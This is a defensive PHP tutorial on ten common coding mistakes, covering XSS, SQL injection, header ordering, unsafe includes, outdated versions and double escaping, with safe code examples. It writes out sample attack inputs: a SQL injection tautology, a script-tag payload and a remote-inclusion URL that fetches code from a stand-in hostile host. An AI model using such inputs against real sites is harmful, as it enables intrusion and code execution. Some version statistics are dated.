10 Common Errors for php programmers

Source: Internet
Author: User
When we develop in PHP we often make the same mistakes without noticing, and some of them get made again and again. Below are the ten mistakes PHP programmers make most often; most of them are security related. Count how many you have made yourself:

1. Not escaping HTML entities

Basic rule: all untrusted input (especially data submitted by users through forms) must be escaped before it is output.

echo $_GET['username'];

This example may output:

<script>/* script that changes the admin password or sets a cookie */</script>

That is an obvious security hole, unless you can be sure that every one of your users is well-behaved.

How to fix:

We need to convert "<", ">", "&" and the quote characters into their HTML entity forms (&lt;, &gt;, &amp;, &#039; and &quot;); the functions htmlspecialchars() and htmlentities() do exactly that.

The correct way is echo htmlspecialchars($_GET['username'], ENT_QUOTES); pass the page's character set as the third argument so multi-byte input is handled correctly. This covers HTML text and attribute values; data placed inside a URL or a JavaScript block needs escaping for that context instead.
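As an added example (not code from the original article), the following script shows the same parameter echoed raw and then escaped for two HTML contexts, text content and an attribute value. The $request array is a constructed stand-in for $_GET, and the helper name h() is an assumption.

```php
<?php
// Added example, not from the original article: escaping untrusted input for
// HTML text and for a double-quoted attribute. $request stands in for $_GET.
declare(strict_types=1);

/** Escape a string for use as HTML text or inside a double-quoted attribute. */
function h(string $value): string
{
    // ENT_QUOTES escapes both ' and "; ENT_SUBSTITUTE replaces invalid UTF-8
    // instead of returning an empty string; always state the charset explicitly.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Vulnerable: echoes the raw parameter, so any markup in it becomes part of the page. */
function renderUnsafe(array $request): string
{
    return '<p>Hello, ' . $request['username'] . '</p>';
}

/** Hardened: the same page with every untrusted value escaped for its context. */
function renderSafe(array $request): string
{
    $name = h($request['username']);
    return '<p>Hello, ' . $name . '</p>' . "\n"
         . '<input type="text" name="username" value="' . $name . '">';
}

// Constructed payload in the style of the article's example.
$request = ['username' => '<script>/* change admin password */</script>'];

// The unsafe page hands the browser a live <script> element.
echo renderUnsafe($request), "\n";

// The safe page shows the same characters as text; no script element exists.
echo renderSafe($request), "\n";
```

Escaping at output time, as close to the echo as possible, is the point: data stored in the database stays raw, and every place it is printed decides how to encode it.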

2. Not escaping SQL input

I covered this in "The simplest way to prevent SQL injection (in PHP + MySQL)" and gave a simple method there. Some people told me they had already set magic_quotes to On in php.ini and therefore did not need to worry about it. But not all input comes from $_GET, $_POST or $_COOKIE!

How to fix:

As in that article, I recommend the mysql_real_escape_string() function, which escapes the string using the character set of the open connection (so it needs a live connection; the mysql extension itself was removed in PHP 7, where mysqli_real_escape_string() or, better, prepared statements take its place).

Correct practice:

<?php
$sql = "UPDATE users SET
            name = '" . mysql_real_escape_string($name) . "'
        WHERE id = '" . mysql_real_escape_string($id) . "'";
mysql_query($sql);
?>
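As an added example (not the article's code), here is the same UPDATE written with PDO prepared statements, which keep the query text and the data apart so the database never parses user input as SQL. An in-memory SQLite database stands in for MySQL so that it runs offline; the table, rows and attacker input are constructed, and the PDO calls are identical for a MySQL DSN.

```php
<?php
// Added example, not from the original article: a vulnerable concatenated UPDATE
// beside the prepared-statement version. SQLite in memory stands in for MySQL.
declare(strict_types=1);

/** Open a fresh database with a constructed users table. */
function connect(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL)');
    $pdo->exec("INSERT INTO users (id, name) VALUES (1, 'alice'), (2, 'bob')");
    return $pdo;
}

/** Vulnerable: string concatenation, the shape the article warns about. */
function renameUserUnsafe(PDO $pdo, string $id, string $name): int
{
    $sql = "UPDATE users SET name = '$name' WHERE id = '$id'";
    return $pdo->exec($sql);
}

/** Hardened: placeholders are bound at execute time and never interpolated. */
function renameUserSafe(PDO $pdo, string $id, string $name): int
{
    $stmt = $pdo->prepare('UPDATE users SET name = :name WHERE id = :id');
    $stmt->execute([':name' => $name, ':id' => $id]);
    return $stmt->rowCount();
}

/** All user names in id order, for inspecting the effect of each update. */
function names(PDO $pdo): array
{
    return $pdo->query('SELECT name FROM users ORDER BY id')->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed attacker input: closes the quoted id and appends a tautology,
// so the concatenated query becomes ... WHERE id = '2' OR '1'='1' and hits every row.
$evilId = "2' OR '1'='1";

$pdo = connect();
renameUserUnsafe($pdo, $evilId, 'pwned');
var_dump(names($pdo));          // every user has been renamed

$pdo = connect();
$rows = renameUserSafe($pdo, $evilId, 'pwned');
var_dump($rows, names($pdo));   // no id equals that literal string, so nothing changes
```

Escaping functions only work when the value lands inside quotes in exactly the way the escaper assumes; a bound parameter has no such assumption, which is why prepared statements are the default recommendation today.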

3. Misusing the HTTP-header functions: header(), session_start() and setcookie()

Have you ever seen this warning? "Warning: Cannot add header information - headers already sent [...]"

Every time a browser fetches a page, the server's output is split into two parts: the headers and the body. The headers carry non-visible data such as cookies, and they always arrive first. The body carries the visible HTML, images and other data.

If output_buffering is Off, every function that sends an HTTP header must be called before any output is produced. The trouble is that you develop in one environment and deploy in another, and their output_buffering settings differ. The result: the cookie or session that worked on your machine is never set on the server...

How to fix:

Make sure every header-related function is called before any output, and develop with output_buffering = Off so the mistake shows up on your own machine rather than on the server. Watch for the usual invisible culprits: a UTF-8 byte-order mark or whitespace before the opening <?php tag, and a newline after a closing ?> in an included file.
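The following login handler is an added example (not from the original article) of ordering a request so that every header goes out before the first byte of the body, and of using headers_sent() to report which file and line produced stray output when it is too late. The credential check and the /home.php redirect target are constructed.

```php
<?php
// Added example, not from the original article: send all headers first, then
// the body, and diagnose premature output. credentialsValid() is a stub.
declare(strict_types=1);

/** Constructed stand-in for a real credential check. */
function credentialsValid(string $user, string $pass): bool
{
    return $user === 'alice' && $pass === 'correct horse';
}

/**
 * True while header-sending calls are still possible; otherwise logs the file
 * and line of the output that closed the header section.
 */
function canSendHeaders(): bool
{
    if (!headers_sent($file, $line)) {
        return true;
    }
    error_log("headers already sent by $file:$line; cannot set cookie or redirect");
    return false;
}

function handleLogin(array $post): void
{
    // 1. Everything that may need a header happens before any output.
    if (!canSendHeaders()) {
        return;
    }
    session_start();   // sends the session cookie header

    if (credentialsValid($post['user'] ?? '', $post['pass'] ?? '')) {
        session_regenerate_id(true);          // fresh id after a privilege change
        $_SESSION['user'] = $post['user'];
        setcookie('remember', '1', [
            'expires'  => time() + 86400,
            'path'     => '/',
            'secure'   => true,
            'httponly' => true,
            'samesite' => 'Lax',
        ]);
        header('Location: /home.php', true, 303);
        exit;                                 // nothing may follow a redirect
    }

    // 2. Only now does the body start; no header call may come after this point.
    http_response_code(401);
    echo '<p>Login failed.</p>';
}

handleLogin($_POST);
```

Leaving the closing ?> tag off files that contain only PHP removes the most common source of accidental trailing whitespace.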

4. Using untrusted data in require or include

Again: do not trust data you have not declared yourself. Never include or require a file whose name comes from $_GET, $_POST or $_COOKIE.

For example, index.php:

<?php
// including header, config, database connection, etc.
include($_GET['filename']);
// including footer
?>

Now anyone can request http://www.yourdomain.com/index.php?filename=anyfile.txt

to read your confidential files or to execute a PHP script of their choosing.

If allow_url_fopen is On (and, since PHP 5.2, allow_url_include is On as well), it is even worse:

Try this input: http://www.yourdomain.com/index.php?filename=http%3A%2F%2Fwww.youaredoomed.com%2Fphphack.php

Now your page executes whatever youaredoomed.com/phphack.php serves, on your server. The attacker can send spam, change passwords, delete files: anything your PHP process is allowed to do.

How to fix:

You must control which files can be passed to include or require.

Here is a quick but incomplete fix:

<?php
// include only files that are on the allowlist (strict comparison, no type juggling)
$allowedFiles = array('file1.txt', 'file2.txt', 'file3.txt');
if (in_array((string) $_GET['filename'], $allowedFiles, true)) {
    include($_GET['filename']);
} else {
    exit('not allowed');
}
?>
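A more complete version, added here as an example rather than taken from the article: the request value is only ever used as a key into a fixed map, so the string from the user never reaches include(), and the resolved path is checked against the pages directory as defence in depth. The pages directory, the page names and the file names are assumptions.

```php
<?php
// Added example, not from the original article: a page router that includes
// only files it names itself. PAGES_DIR and the PAGES entries are assumed.
declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';

/** Public page names mapped to files; the request value is only ever a key here. */
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Resolve a request parameter to an includable path, or null if not allowed.
 * The realpath() check guards against a mis-edited map entry such as '../x.php':
 * nothing that resolves outside PAGES_DIR is ever included.
 */
function resolvePage(?string $requested): ?string
{
    $page = $requested ?? 'home';
    if (!array_key_exists($page, PAGES)) {
        return null;                       // unknown page name: not in the map
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . PAGES[$page]);
    if ($base === false || $path === false) {
        return null;                       // directory or file does not exist
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                       // resolved outside the pages directory
    }
    return $path;
}

$path = resolvePage($_GET['page'] ?? null);
if ($path === null) {
    http_response_code(404);
    exit('Not found');
}
include $path;
```

Because the map holds plain file names and the directory is fixed in code, neither a path such as ../../etc/passwd nor a URL can be turned into an include target, whatever allow_url_include is set to.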

5. Syntax errors

Syntax errors cover all lexical and grammatical mistakes, and they are so common that I have to list them here. The cure is to study PHP's syntax carefully and not to drop a parenthesis, brace, semicolon or quotation mark. The other remedy is to change your editor: stop using Notepad!

6. Using object-oriented techniques rarely or not at all

Many projects make no use of PHP's object-oriented features, and maintaining their code becomes very time- and labour-intensive as a result. PHP supports more object-oriented technology with every release, and it keeps getting better; there is no reason not to use it.

7. Not using a framework

95% of PHP projects do the same four things: create, edit, list and delete. There are many MVC frameworks that help with exactly these four things. Why not use one?

8. Not knowing the functions PHP already has

PHP's core contains a great many functions, yet many programmers keep reinventing the wheel and waste a lot of time. Search the PHP manual before you code, and search Google too; you may well find something new. exec(), for example, is a powerful function that runs a shell command and returns the last line of its output as a string. For safety, pass anything derived from user input through escapeshellarg() (for a single argument) or escapeshellcmd() (for a whole command line) before it reaches the shell.

9. Using an old version of PHP

Many programmers are still on PHP 4. Developing on PHP 4 cannot exploit PHP's full potential and carries some security risks. Moving to PHP 5 takes little effort: most PHP 4 programs migrate with a few changed statements, or none at all. (PHP 4 has been end-of-life since 2008; the same argument applies today to any release that no longer receives security fixes.)

Only 12% of PHP servers run PHP 5, so 88% of PHP developers are still on PHP 4.

10. Escaping quotes twice

Have you ever seen a page that displays \' or \" in the middle of its text? It usually happens because magic_quotes is Off in the developer's environment but On on the production server, where PHP then runs addslashes() a second time on the GET, POST and COOKIE data.

Original text:

It's a string

With magic quotes on:

It\'s a string

After running addslashes() again:

It\\\'s a string

HTML output:

It\'s a string

Another case: the user makes a mistake in the login form, the server detects it and sends the same form back to be filled in again, and the user's input gets escaped twice on the way!
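As an added example (not the article's code), the script below reproduces the double escape and shows the classic fix: undo magic_quotes_gpc once at the top of the request so that the rest of the code sees raw input, then escape for HTML, not with addslashes(), when the value is redisplayed in the form. get_magic_quotes_gpc() exists up to PHP 7.4 (magic quotes themselves were removed in 5.4 and the function in 8.0), so the helper guards the call with function_exists(); the sample input is constructed.

```php
<?php
// Added example, not from the original article: the double escape and the
// normalise-once fix. get_magic_quotes_gpc() is guarded for PHP 8 and later.
declare(strict_types=1);

/** Undo magic_quotes_gpc so application code sees the raw input exactly once. */
function stripMagicQuotes(array $input): array
{
    if (!function_exists('get_magic_quotes_gpc') || !@get_magic_quotes_gpc()) {
        return $input;   // nothing was added, so nothing to remove
    }
    $strip = function ($v) use (&$strip) {
        return is_array($v) ? array_map($strip, $v) : stripslashes((string) $v);
    };
    return array_map($strip, $input);
}

/** What the article describes: escaping applied by the server and then again by code. */
function doubleEscaped(string $raw): string
{
    $afterMagicQuotes = addslashes($raw);    // what $_POST held with magic_quotes_gpc=On
    return addslashes($afterMagicQuotes);    // the redundant addslashes() in application code
}

/** Redisplay a submitted value in a form field: HTML escaping, never addslashes(). */
function formField(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="'
         . htmlspecialchars($value, ENT_QUOTES, 'UTF-8') . '">';
}

$original = "It's a string";          // constructed sample input

echo doubleEscaped($original), "\n";  // the triple-backslash form from the article

$post = stripMagicQuotes(['name' => $original]);
echo formField('name', $post['name']), "\n";   // the apostrophe survives as &#039;
```

The rule that avoids both symptoms in the article is one escaping step per destination: SQL escaping (or a bound parameter) when a value goes into a query, HTML escaping when it goes into a page, and nothing at all when it is merely carried from one request to the next.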
